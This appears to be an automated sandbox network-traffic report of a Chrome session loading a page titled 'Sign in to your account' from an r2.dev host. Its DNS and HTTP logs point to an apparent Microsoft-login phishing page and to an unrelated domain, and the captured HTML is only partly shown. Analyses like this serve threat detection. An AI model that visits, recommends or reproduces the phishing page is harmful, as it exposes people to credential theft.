May 24, 2024 00:29:19.061703920 CEST	49754	443	192.168.2.4	152.199.23.37
May 24, 2024 00:29:19.100222111 CEST	443	49756	148.72.158.229	192.168.2.4
May 24, 2024 00:29:19.142091990 CEST	49756	443	192.168.2.4	148.72.158.229
May 24, 2024 00:29:19.142106056 CEST	443	49756	148.72.158.229	192.168.2.4
May 24, 2024 00:29:19.143162966 CEST	443	49756	148.72.158.229	192.168.2.4
May 24, 2024 00:29:19.144748926 CEST	49756	443	192.168.2.4	148.72.158.229
May 24, 2024 00:29:19.275655985 CEST	443	49754	152.199.23.37	192.168.2.4
May 24, 2024 00:29:19.279519081 CEST	443	49754	152.199.23.37	192.168.2.4
May 24, 2024 00:29:19.279678106 CEST	443	49754	152.199.23.37	192.168.2.4
May 24, 2024 00:29:19.279834032 CEST	49754	443	192.168.2.4	152.199.23.37
May 24, 2024 00:29:20.365706921 CEST	49756	443	192.168.2.4	148.72.158.229
May 24, 2024 00:29:20.365933895 CEST	443	49756	148.72.158.229	192.168.2.4
May 24, 2024 00:29:20.398504972 CEST	49756	443	192.168.2.4	148.72.158.229
May 24, 2024 00:29:20.398525000 CEST	443	49756	148.72.158.229	192.168.2.4
May 24, 2024 00:29:20.440923929 CEST	49754	443	192.168.2.4	152.199.23.37
May 24, 2024 00:29:20.440988064 CEST	443	49754	152.199.23.37	192.168.2.4
May 24, 2024 00:29:20.461044073 CEST	49756	443	192.168.2.4	148.72.158.229
May 24, 2024 00:29:20.598690987 CEST	443	49756	148.72.158.229	192.168.2.4
May 24, 2024 00:29:20.598743916 CEST	443	49756	148.72.158.229	192.168.2.4
May 24, 2024 00:29:20.598793030 CEST	49756	443	192.168.2.4	148.72.158.229
May 24, 2024 00:29:20.599420071 CEST	49756	443	192.168.2.4	148.72.158.229
May 24, 2024 00:29:20.599431038 CEST	443	49756	148.72.158.229	192.168.2.4
May 24, 2024 00:29:20.599450111 CEST	49756	443	192.168.2.4	148.72.158.229
May 24, 2024 00:29:20.599469900 CEST	49756	443	192.168.2.4	148.72.158.229
May 24, 2024 00:29:26.959507942 CEST	443	49743	142.250.184.228	192.168.2.4
May 24, 2024 00:29:26.959578991 CEST	443	49743	142.250.184.228	192.168.2.4
May 24, 2024 00:29:26.959645987 CEST	49743	443	192.168.2.4	142.250.184.228
May 24, 2024 00:29:27.730896950 CEST	49743	443	192.168.2.4	142.250.184.228
May 24, 2024 00:29:27.730935097 CEST	443	49743	142.250.184.228	192.168.2.4
May 24, 2024 00:29:29.139406919 CEST	80	49735	104.18.2.35	192.168.2.4
May 24, 2024 00:29:29.139523029 CEST	49735	80	192.168.2.4	104.18.2.35
May 24, 2024 00:29:30.187529087 CEST	49735	80	192.168.2.4	104.18.2.35
May 24, 2024 00:29:30.201056957 CEST	80	49735	104.18.2.35	192.168.2.4
May 24, 2024 00:29:59.249593019 CEST	49736	80	192.168.2.4	104.18.2.35
May 24, 2024 00:29:59.257502079 CEST	80	49736	104.18.2.35	192.168.2.4
May 24, 2024 00:30:13.725693941 CEST	60898	53	192.168.2.4	1.1.1.1
May 24, 2024 00:30:13.738953114 CEST	53	60898	1.1.1.1	192.168.2.4
May 24, 2024 00:30:13.739027977 CEST	60898	53	192.168.2.4	1.1.1.1
May 24, 2024 00:30:13.739088058 CEST	60898	53	192.168.2.4	1.1.1.1
May 24, 2024 00:30:13.771589041 CEST	53	60898	1.1.1.1	192.168.2.4
May 24, 2024 00:30:13.838897943 CEST	60899	53	192.168.2.4	1.1.1.1
May 24, 2024 00:30:13.845072031 CEST	53	60899	1.1.1.1	192.168.2.4
May 24, 2024 00:30:13.845136881 CEST	60899	53	192.168.2.4	1.1.1.1
May 24, 2024 00:30:13.845333099 CEST	60899	53	192.168.2.4	1.1.1.1
May 24, 2024 00:30:13.845386028 CEST	60899	53	192.168.2.4	1.1.1.1
May 24, 2024 00:30:13.866036892 CEST	53	60899	1.1.1.1	192.168.2.4
May 24, 2024 00:30:13.866050959 CEST	53	60899	1.1.1.1	192.168.2.4
May 24, 2024 00:30:14.206887007 CEST	53	60898	1.1.1.1	192.168.2.4
May 24, 2024 00:30:14.207487106 CEST	60898	53	192.168.2.4	1.1.1.1
May 24, 2024 00:30:14.233124018 CEST	53	60898	1.1.1.1	192.168.2.4
May 24, 2024 00:30:14.233186007 CEST	60898	53	192.168.2.4	1.1.1.1
May 24, 2024 00:30:14.321964979 CEST	53	60899	1.1.1.1	192.168.2.4
May 24, 2024 00:30:14.323069096 CEST	60899	53	192.168.2.4	1.1.1.1
May 24, 2024 00:30:14.340882063 CEST	53	60899	1.1.1.1	192.168.2.4
May 24, 2024 00:30:14.340960026 CEST	60899	53	192.168.2.4	1.1.1.1
May 24, 2024 00:30:16.402404070 CEST	60902	443	192.168.2.4	142.250.184.228
May 24, 2024 00:30:16.402448893 CEST	443	60902	142.250.184.228	192.168.2.4
May 24, 2024 00:30:16.402631044 CEST	60902	443	192.168.2.4	142.250.184.228
May 24, 2024 00:30:16.403228045 CEST	60902	443	192.168.2.4	142.250.184.228
May 24, 2024 00:30:16.403245926 CEST	443	60902	142.250.184.228	192.168.2.4
May 24, 2024 00:30:17.082743883 CEST	443	60902	142.250.184.228	192.168.2.4
May 24, 2024 00:30:17.088537931 CEST	60902	443	192.168.2.4	142.250.184.228
May 24, 2024 00:30:17.088566065 CEST	443	60902	142.250.184.228	192.168.2.4
May 24, 2024 00:30:17.089199066 CEST	443	60902	142.250.184.228	192.168.2.4
May 24, 2024 00:30:17.089689016 CEST	60902	443	192.168.2.4	142.250.184.228
May 24, 2024 00:30:17.089788914 CEST	443	60902	142.250.184.228	192.168.2.4
May 24, 2024 00:30:17.140810966 CEST	60902	443	192.168.2.4	142.250.184.228
May 24, 2024 00:30:24.468725920 CEST	49723	80	192.168.2.4	199.232.210.172
May 24, 2024 00:30:24.468940973 CEST	49724	80	192.168.2.4	199.232.210.172
May 24, 2024 00:30:24.496803045 CEST	80	49723	199.232.210.172	192.168.2.4
May 24, 2024 00:30:24.496867895 CEST	49723	80	192.168.2.4	199.232.210.172
May 24, 2024 00:30:24.501837969 CEST	80	49724	199.232.210.172	192.168.2.4
May 24, 2024 00:30:24.501897097 CEST	49724	80	192.168.2.4	199.232.210.172
May 24, 2024 00:30:26.977005959 CEST	443	60902	142.250.184.228	192.168.2.4
May 24, 2024 00:30:26.977176905 CEST	443	60902	142.250.184.228	192.168.2.4
May 24, 2024 00:30:26.978437901 CEST	60902	443	192.168.2.4	142.250.184.228
May 24, 2024 00:30:28.283113003 CEST	60902	443	192.168.2.4	142.250.184.228
May 24, 2024 00:30:28.283137083 CEST	443	60902	142.250.184.228	192.168.2.4

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
May 24, 2024 00:29:11.834620953 CEST	53	63598	1.1.1.1	192.168.2.4
May 24, 2024 00:29:11.945861101 CEST	53	53160	1.1.1.1	192.168.2.4
May 24, 2024 00:29:13.042243958 CEST	53	63663	1.1.1.1	192.168.2.4
May 24, 2024 00:29:13.696670055 CEST	56919	53	192.168.2.4	1.1.1.1
May 24, 2024 00:29:13.698956966 CEST	54220	53	192.168.2.4	1.1.1.1
May 24, 2024 00:29:13.713136911 CEST	53	56919	1.1.1.1	192.168.2.4
May 24, 2024 00:29:13.719683886 CEST	53	54220	1.1.1.1	192.168.2.4
May 24, 2024 00:29:14.246776104 CEST	55410	53	192.168.2.4	1.1.1.1
May 24, 2024 00:29:14.246777058 CEST	58391	53	192.168.2.4	1.1.1.1
May 24, 2024 00:29:14.261636019 CEST	53	58391	1.1.1.1	192.168.2.4
May 24, 2024 00:29:14.262391090 CEST	53	55410	1.1.1.1	192.168.2.4
May 24, 2024 00:29:15.306497097 CEST	53354	53	192.168.2.4	1.1.1.1
May 24, 2024 00:29:15.307116032 CEST	53840	53	192.168.2.4	1.1.1.1
May 24, 2024 00:29:15.321767092 CEST	54606	53	192.168.2.4	1.1.1.1
May 24, 2024 00:29:15.322069883 CEST	49812	53	192.168.2.4	1.1.1.1
May 24, 2024 00:29:15.398171902 CEST	53	53840	1.1.1.1	192.168.2.4
May 24, 2024 00:29:15.398190022 CEST	53	53354	1.1.1.1	192.168.2.4
May 24, 2024 00:29:15.398220062 CEST	53	54606	1.1.1.1	192.168.2.4
May 24, 2024 00:29:15.398267031 CEST	53	49812	1.1.1.1	192.168.2.4
May 24, 2024 00:29:16.335895061 CEST	49930	53	192.168.2.4	1.1.1.1
May 24, 2024 00:29:16.338634968 CEST	62681	53	192.168.2.4	1.1.1.1
May 24, 2024 00:29:16.372819901 CEST	53	62681	1.1.1.1	192.168.2.4
May 24, 2024 00:29:16.372831106 CEST	53	49930	1.1.1.1	192.168.2.4
May 24, 2024 00:29:16.493138075 CEST	57381	53	192.168.2.4	1.1.1.1
May 24, 2024 00:29:16.493488073 CEST	58695	53	192.168.2.4	1.1.1.1
May 24, 2024 00:29:16.534039974 CEST	53	50292	1.1.1.1	192.168.2.4
May 24, 2024 00:29:16.700719118 CEST	50445	53	192.168.2.4	1.1.1.1
May 24, 2024 00:29:16.701344013 CEST	50370	53	192.168.2.4	1.1.1.1
May 24, 2024 00:29:16.712415934 CEST	53	50370	1.1.1.1	192.168.2.4
May 24, 2024 00:29:16.712446928 CEST	53	50445	1.1.1.1	192.168.2.4
May 24, 2024 00:29:16.797662973 CEST	53	57381	1.1.1.1	192.168.2.4
May 24, 2024 00:29:17.272002935 CEST	53	58695	1.1.1.1	192.168.2.4
May 24, 2024 00:29:18.051939011 CEST	64107	53	192.168.2.4	1.1.1.1
May 24, 2024 00:29:18.052162886 CEST	57759	53	192.168.2.4	1.1.1.1
May 24, 2024 00:29:18.382082939 CEST	53	57759	1.1.1.1	192.168.2.4
May 24, 2024 00:29:18.552932978 CEST	53	64107	1.1.1.1	192.168.2.4
May 24, 2024 00:29:26.359889984 CEST	59443	53	192.168.2.4	1.1.1.1
May 24, 2024 00:29:26.360611916 CEST	57030	53	192.168.2.4	1.1.1.1
May 24, 2024 00:29:27.731601000 CEST	54101	53	192.168.2.4	1.1.1.1
May 24, 2024 00:29:27.731817007 CEST	56073	53	192.168.2.4	1.1.1.1
May 24, 2024 00:29:30.821203947 CEST	53	57091	1.1.1.1	192.168.2.4
May 24, 2024 00:29:31.314918041 CEST	59399	53	192.168.2.4	1.1.1.1
May 24, 2024 00:29:31.315085888 CEST	63859	53	192.168.2.4	1.1.1.1
May 24, 2024 00:29:31.556224108 CEST	53	64749	1.1.1.1	192.168.2.4
May 24, 2024 00:29:36.060914993 CEST	138	138	192.168.2.4	192.168.2.255
May 24, 2024 00:29:50.518007040 CEST	53	49770	1.1.1.1	192.168.2.4
May 24, 2024 00:30:11.627497911 CEST	53	61821	1.1.1.1	192.168.2.4
May 24, 2024 00:30:13.725239038 CEST	53	55112	1.1.1.1	192.168.2.4
May 24, 2024 00:30:13.837770939 CEST	53	52724	1.1.1.1	192.168.2.4
May 24, 2024 00:30:13.837788105 CEST	53	60063	1.1.1.1	192.168.2.4

ICMP Packets

Timestamp	Source IP	Dest IP	Checksum	Code	Type
May 24, 2024 00:29:16.702928066 CEST	192.168.2.4	1.1.1.1	c2da	(Port unreachable)	Destination Unreachable
May 24, 2024 00:29:27.819138050 CEST	192.168.2.4	1.1.1.1	c291	(Port unreachable)	Destination Unreachable

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
May 24, 2024 00:29:13.696670055 CEST	192.168.2.4	1.1.1.1	0x5c0c	Standard query (0)	pub-7fd529f896e54cb89ccd931b77e144a6.r2.dev	A (IP address)	IN (0x0001)	false
May 24, 2024 00:29:13.698956966 CEST	192.168.2.4	1.1.1.1	0xedf5	Standard query (0)	pub-7fd529f896e54cb89ccd931b77e144a6.r2.dev	65	IN (0x0001)	false
May 24, 2024 00:29:14.246776104 CEST	192.168.2.4	1.1.1.1	0xc213	Standard query (0)	pub-7fd529f896e54cb89ccd931b77e144a6.r2.dev	A (IP address)	IN (0x0001)	false
May 24, 2024 00:29:14.246777058 CEST	192.168.2.4	1.1.1.1	0xa091	Standard query (0)	pub-7fd529f896e54cb89ccd931b77e144a6.r2.dev	65	IN (0x0001)	false
May 24, 2024 00:29:15.306497097 CEST	192.168.2.4	1.1.1.1	0xf6ad	Standard query (0)	code.jquery.com	A (IP address)	IN (0x0001)	false
May 24, 2024 00:29:15.307116032 CEST	192.168.2.4	1.1.1.1	0x1a02	Standard query (0)	code.jquery.com	65	IN (0x0001)	false
May 24, 2024 00:29:15.321767092 CEST	192.168.2.4	1.1.1.1	0xb105	Standard query (0)	aadcdn.msftauth.net	A (IP address)	IN (0x0001)	false
May 24, 2024 00:29:15.322069883 CEST	192.168.2.4	1.1.1.1	0x9922	Standard query (0)	aadcdn.msftauth.net	65	IN (0x0001)	false
May 24, 2024 00:29:16.335895061 CEST	192.168.2.4	1.1.1.1	0xbc32	Standard query (0)	www.google.com	A (IP address)	IN (0x0001)	false
May 24, 2024 00:29:16.338634968 CEST	192.168.2.4	1.1.1.1	0x744	Standard query (0)	www.google.com	65	IN (0x0001)	false
May 24, 2024 00:29:16.493138075 CEST	192.168.2.4	1.1.1.1	0xfa85	Standard query (0)	c2millwrightmachineshop.ca	A (IP address)	IN (0x0001)	false
May 24, 2024 00:29:16.493488073 CEST	192.168.2.4	1.1.1.1	0xd698	Standard query (0)	c2millwrightmachineshop.ca	65	IN (0x0001)	false
May 24, 2024 00:29:16.700719118 CEST	192.168.2.4	1.1.1.1	0xc829	Standard query (0)	aadcdn.msftauth.net	A (IP address)	IN (0x0001)	false
May 24, 2024 00:29:16.701344013 CEST	192.168.2.4	1.1.1.1	0xd7f5	Standard query (0)	aadcdn.msftauth.net	65	IN (0x0001)	false
May 24, 2024 00:29:18.051939011 CEST	192.168.2.4	1.1.1.1	0xdda5	Standard query (0)	c2millwrightmachineshop.ca	A (IP address)	IN (0x0001)	false
May 24, 2024 00:29:18.052162886 CEST	192.168.2.4	1.1.1.1	0xf016	Standard query (0)	c2millwrightmachineshop.ca	65	IN (0x0001)	false
May 24, 2024 00:29:26.359889984 CEST	192.168.2.4	1.1.1.1	0x1a58	Standard query (0)	passwordreset.microsoftonline.com	A (IP address)	IN (0x0001)	false
May 24, 2024 00:29:26.360611916 CEST	192.168.2.4	1.1.1.1	0x5696	Standard query (0)	passwordreset.microsoftonline.com	65	IN (0x0001)	false
May 24, 2024 00:29:27.731601000 CEST	192.168.2.4	1.1.1.1	0x5afc	Standard query (0)	ajax.aspnetcdn.com	A (IP address)	IN (0x0001)	false
May 24, 2024 00:29:27.731817007 CEST	192.168.2.4	1.1.1.1	0x5127	Standard query (0)	ajax.aspnetcdn.com	65	IN (0x0001)	false
May 24, 2024 00:29:31.314918041 CEST	192.168.2.4	1.1.1.1	0xc421	Standard query (0)	passwordreset.microsoftonline.com	A (IP address)	IN (0x0001)	false
May 24, 2024 00:29:31.315085888 CEST	192.168.2.4	1.1.1.1	0x4862	Standard query (0)	passwordreset.microsoftonline.com	65	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
May 24, 2024 00:29:13.713136911 CEST	1.1.1.1	192.168.2.4	0x5c0c	No error (0)	pub-7fd529f896e54cb89ccd931b77e144a6.r2.dev		104.18.2.35	A (IP address)	IN (0x0001)	false
May 24, 2024 00:29:13.713136911 CEST	1.1.1.1	192.168.2.4	0x5c0c	No error (0)	pub-7fd529f896e54cb89ccd931b77e144a6.r2.dev		104.18.3.35	A (IP address)	IN (0x0001)	false
May 24, 2024 00:29:14.262391090 CEST	1.1.1.1	192.168.2.4	0xc213	No error (0)	pub-7fd529f896e54cb89ccd931b77e144a6.r2.dev		104.18.2.35	A (IP address)	IN (0x0001)	false
May 24, 2024 00:29:14.262391090 CEST	1.1.1.1	192.168.2.4	0xc213	No error (0)	pub-7fd529f896e54cb89ccd931b77e144a6.r2.dev		104.18.3.35	A (IP address)	IN (0x0001)	false
May 24, 2024 00:29:15.398190022 CEST	1.1.1.1	192.168.2.4	0xf6ad	No error (0)	code.jquery.com		151.101.194.137	A (IP address)	IN (0x0001)	false
May 24, 2024 00:29:15.398190022 CEST	1.1.1.1	192.168.2.4	0xf6ad	No error (0)	code.jquery.com		151.101.66.137	A (IP address)	IN (0x0001)	false
May 24, 2024 00:29:15.398190022 CEST	1.1.1.1	192.168.2.4	0xf6ad	No error (0)	code.jquery.com		151.101.2.137	A (IP address)	IN (0x0001)	false
May 24, 2024 00:29:15.398190022 CEST	1.1.1.1	192.168.2.4	0xf6ad	No error (0)	code.jquery.com		151.101.130.137	A (IP address)	IN (0x0001)	false
May 24, 2024 00:29:15.398204088 CEST	1.1.1.1	192.168.2.4	0x1d39	No error (0)	shed.dual-low.part-0017.t-0009.t-msedge.net	part-0017.t-0009.t-msedge.net		CNAME (Canonical name)	IN (0x0001)	false
May 24, 2024 00:29:15.398204088 CEST	1.1.1.1	192.168.2.4	0x1d39	No error (0)	part-0017.t-0009.t-msedge.net		13.107.213.45	A (IP address)	IN (0x0001)	false
May 24, 2024 00:29:15.398204088 CEST	1.1.1.1	192.168.2.4	0x1d39	No error (0)	part-0017.t-0009.t-msedge.net		13.107.246.45	A (IP address)	IN (0x0001)	false
May 24, 2024 00:29:15.398220062 CEST	1.1.1.1	192.168.2.4	0xb105	No error (0)	aadcdn.msftauth.net	cs1100.wpc.omegacdn.net		CNAME (Canonical name)	IN (0x0001)	false
May 24, 2024 00:29:15.398220062 CEST	1.1.1.1	192.168.2.4	0xb105	No error (0)	cs1100.wpc.omegacdn.net		152.199.23.37	A (IP address)	IN (0x0001)	false
May 24, 2024 00:29:15.398267031 CEST	1.1.1.1	192.168.2.4	0x9922	No error (0)	aadcdn.msftauth.net	cs1100.wpc.omegacdn.net		CNAME (Canonical name)	IN (0x0001)	false
May 24, 2024 00:29:16.372819901 CEST	1.1.1.1	192.168.2.4	0x744	No error (0)	www.google.com			65	IN (0x0001)	false
May 24, 2024 00:29:16.372831106 CEST	1.1.1.1	192.168.2.4	0xbc32	No error (0)	www.google.com		142.250.184.228	A (IP address)	IN (0x0001)	false
May 24, 2024 00:29:16.671561956 CEST	1.1.1.1	192.168.2.4	0xbc87	No error (0)	shed.dual-low.part-0039.t-0009.t-msedge.net	part-0039.t-0009.t-msedge.net		CNAME (Canonical name)	IN (0x0001)	false
May 24, 2024 00:29:16.671561956 CEST	1.1.1.1	192.168.2.4	0xbc87	No error (0)	part-0039.t-0009.t-msedge.net		13.107.213.67	A (IP address)	IN (0x0001)	false
May 24, 2024 00:29:16.671561956 CEST	1.1.1.1	192.168.2.4	0xbc87	No error (0)	part-0039.t-0009.t-msedge.net		13.107.246.67	A (IP address)	IN (0x0001)	false
May 24, 2024 00:29:16.712415934 CEST	1.1.1.1	192.168.2.4	0xd7f5	No error (0)	aadcdn.msftauth.net	cs1100.wpc.omegacdn.net		CNAME (Canonical name)	IN (0x0001)	false
May 24, 2024 00:29:16.712446928 CEST	1.1.1.1	192.168.2.4	0xc829	No error (0)	aadcdn.msftauth.net	cs1100.wpc.omegacdn.net		CNAME (Canonical name)	IN (0x0001)	false
May 24, 2024 00:29:16.712446928 CEST	1.1.1.1	192.168.2.4	0xc829	No error (0)	cs1100.wpc.omegacdn.net		152.199.23.37	A (IP address)	IN (0x0001)	false
May 24, 2024 00:29:16.797662973 CEST	1.1.1.1	192.168.2.4	0xfa85	No error (0)	c2millwrightmachineshop.ca		148.72.158.229	A (IP address)	IN (0x0001)	false
May 24, 2024 00:29:18.552932978 CEST	1.1.1.1	192.168.2.4	0xdda5	No error (0)	c2millwrightmachineshop.ca		148.72.158.229	A (IP address)	IN (0x0001)	false
May 24, 2024 00:29:26.367867947 CEST	1.1.1.1	192.168.2.4	0x1a58	No error (0)	passwordreset.microsoftonline.com	passwordreset.mso.msidentity.com		CNAME (Canonical name)	IN (0x0001)	false
May 24, 2024 00:29:26.386323929 CEST	1.1.1.1	192.168.2.4	0x5696	No error (0)	passwordreset.microsoftonline.com	passwordreset.mso.msidentity.com		CNAME (Canonical name)	IN (0x0001)	false
May 24, 2024 00:29:27.741911888 CEST	1.1.1.1	192.168.2.4	0x5afc	No error (0)	ajax.aspnetcdn.com	mscomajax.vo.msecnd.net		CNAME (Canonical name)	IN (0x0001)	false
May 24, 2024 00:29:27.741955996 CEST	1.1.1.1	192.168.2.4	0x5127	No error (0)	ajax.aspnetcdn.com	mscomajax.vo.msecnd.net		CNAME (Canonical name)	IN (0x0001)	false
May 24, 2024 00:29:29.318835020 CEST	1.1.1.1	192.168.2.4	0x27b7	No error (0)	bg.microsoft.map.fastly.net		199.232.214.172	A (IP address)	IN (0x0001)	false
May 24, 2024 00:29:29.318835020 CEST	1.1.1.1	192.168.2.4	0x27b7	No error (0)	bg.microsoft.map.fastly.net		199.232.210.172	A (IP address)	IN (0x0001)	false
May 24, 2024 00:29:29.937488079 CEST	1.1.1.1	192.168.2.4	0x7c8	No error (0)	fp2e7a.wpc.2be4.phicdn.net	fp2e7a.wpc.phicdn.net		CNAME (Canonical name)	IN (0x0001)	false
May 24, 2024 00:29:29.937488079 CEST	1.1.1.1	192.168.2.4	0x7c8	No error (0)	fp2e7a.wpc.phicdn.net		192.229.221.95	A (IP address)	IN (0x0001)	false
May 24, 2024 00:29:31.333420992 CEST	1.1.1.1	192.168.2.4	0xc421	No error (0)	passwordreset.microsoftonline.com	passwordreset.mso.msidentity.com		CNAME (Canonical name)	IN (0x0001)	false
May 24, 2024 00:29:31.374732971 CEST	1.1.1.1	192.168.2.4	0x4862	No error (0)	passwordreset.microsoftonline.com	passwordreset.mso.msidentity.com		CNAME (Canonical name)	IN (0x0001)	false
May 24, 2024 00:29:43.311446905 CEST	1.1.1.1	192.168.2.4	0xf4f4	No error (0)	fp2e7a.wpc.2be4.phicdn.net	fp2e7a.wpc.phicdn.net		CNAME (Canonical name)	IN (0x0001)	false
May 24, 2024 00:29:43.311446905 CEST	1.1.1.1	192.168.2.4	0xf4f4	No error (0)	fp2e7a.wpc.phicdn.net		192.229.221.95	A (IP address)	IN (0x0001)	false
May 24, 2024 00:30:05.701895952 CEST	1.1.1.1	192.168.2.4	0x35ab	No error (0)	fp2e7a.wpc.2be4.phicdn.net	fp2e7a.wpc.phicdn.net		CNAME (Canonical name)	IN (0x0001)	false
May 24, 2024 00:30:05.701895952 CEST	1.1.1.1	192.168.2.4	0x35ab	No error (0)	fp2e7a.wpc.phicdn.net		192.229.221.95	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

pub-7fd529f896e54cb89ccd931b77e144a6.r2.dev

https:

code.jquery.com

aadcdn.msauth.net

aadcdn.msftauth.net

c2millwrightmachineshop.ca

fs.microsoft.com

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.4	49736	104.18.2.35	80	3452	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
May 24, 2024 00:29:13.735626936 CEST	469	OUT	GET /2024ot.html HTTP/1.1 Host: pub-7fd529f896e54cb89ccd931b77e144a6.r2.dev Connection: keep-alive Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9
May 24, 2024 00:29:14.242774010 CEST	525	IN	HTTP/1.1 301 Moved Permanently Date: Thu, 23 May 2024 22:29:14 GMT Content-Type: text/html Content-Length: 167 Connection: keep-alive Cache-Control: max-age=3600 Expires: Thu, 23 May 2024 23:29:14 GMT Location: https://pub-7fd529f896e54cb89ccd931b77e144a6.r2.dev/2024ot.html Vary: Accept-Encoding Server: cloudflare CF-RAY: 88887bcbbc6f1839-EWR Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>cloudflare</center></body></html>
May 24, 2024 00:29:59.249593019 CEST	6	OUT	Data Raw: 00 Data Ascii:

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.4	49737	104.18.2.35	443	3452	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-05-23 22:29:14 UTC	697	OUT	GET /2024ot.html HTTP/1.1 Host: pub-7fd529f896e54cb89ccd931b77e144a6.r2.dev Connection: keep-alive Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Sec-Fetch-Site: none Sec-Fetch-Mode: navigate Sec-Fetch-User: ?1 Sec-Fetch-Dest: document sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 sec-ch-ua-platform: "Windows" Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-05-23 22:29:15 UTC	284	IN	HTTP/1.1 200 OK Date: Thu, 23 May 2024 22:29:15 GMT Content-Type: text/html Content-Length: 114288 Connection: close Accept-Ranges: bytes ETag: "f717a896cf591d9a08d0e74947a3ec53" Last-Modified: Thu, 11 Jan 2024 12:38:06 GMT Server: cloudflare CF-RAY: 88887bd00c2942c9-EWR
2024-05-23 22:29:15 UTC	1369	IN	Data Raw: 3c 68 74 6d 6c 20 64 69 72 3d 22 6c 74 72 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 09 3c 74 69 74 6c 65 3e 53 69 67 6e 20 69 6e 20 74 6f 20 79 6f 75 72 20 61 63 63 6f 75 6e 74 3c 2f 74 69 74 6c 65 3e 0d 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 0d 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0d 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 6e 65 22 3e 0d 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 Data Ascii: <html dir="ltr" lang="en"><head><title>Sign in to your account</title><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="robots" content="none"><meta name="v
2024-05-23 22:29:15 UTC	1369	IN	Data Raw: 3b 6d 61 72 67 69 6e 3a 30 7d 62 75 74 74 6f 6e 7b 6f 76 65 72 66 6c 6f 77 3a 76 69 73 69 62 6c 65 7d 62 75 74 74 6f 6e 2c 73 65 6c 65 63 74 7b 74 65 78 74 2d 74 72 61 6e 73 66 6f 72 6d 3a 6e 6f 6e 65 7d 62 75 74 74 6f 6e 2c 68 74 6d 6c 20 69 6e 70 75 74 5b 74 79 70 65 3d 62 75 74 74 6f 6e 5d 2c 69 6e 70 75 74 5b 74 79 70 65 3d 72 65 73 65 74 5d 2c 69 6e 70 75 74 5b 74 79 70 65 3d 73 75 62 6d 69 74 5d 7b 2d 77 65 62 6b 69 74 2d 61 70 70 65 61 72 61 6e 63 65 3a 62 75 74 74 6f 6e 3b 63 75 72 73 6f 72 3a 70 6f 69 6e 74 65 72 7d 62 75 74 74 6f 6e 5b 64 69 73 61 62 6c 65 64 5d 2c 68 74 6d 6c 20 69 6e 70 75 74 5b 64 69 73 61 62 6c 65 64 5d 7b 63 75 72 73 6f 72 3a 64 65 66 61 75 6c 74 7d 62 75 74 74 6f 6e 3a 3a 2d 6d 6f 7a 2d 66 6f 63 75 73 2d 69 6e 6e 65 72 2c Data Ascii: ;margin:0}button{overflow:visible}button,select{text-transform:none}button,html input[type=button],input[type=reset],input[type=submit]{-webkit-appearance:button;cursor:pointer}button[disabled],html input[disabled]{cursor:default}button::-moz-focus-inner,
